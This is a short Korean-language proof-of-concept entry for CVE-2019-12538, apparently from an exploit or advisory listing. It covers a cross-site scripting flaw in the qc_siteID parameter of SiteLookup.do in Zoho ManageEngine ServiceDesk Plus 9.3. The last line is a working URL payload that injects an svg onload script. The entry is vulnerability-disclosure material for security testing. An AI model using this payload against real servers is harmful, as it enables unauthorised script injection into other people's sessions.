
CVE-2019-12538에 대한 개념 증명: Zoho ManageEngine ServiceDesk Plus 9.3의 SiteLookup.do qc_siteID 매개변수를 통한 XSS 취약점. 보안 테스트를 위한 페이로드를 포함합니다.
정보 설명: Zoho ManageEngine ServiceDesk Plus 9.3에서 문제가 발견되었습니다. SiteLookup.do의 qc_siteID 매개변수를 통해 XSS가 발생합니다.
작성자: Tarantula 팀의 Concobe - VinCSS (Vingroup 소속)
domain/SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/><svg onload=alert('XSS')>&userConfigID=1&SELECTEDSITEID=1&SELECTEDSITENAME=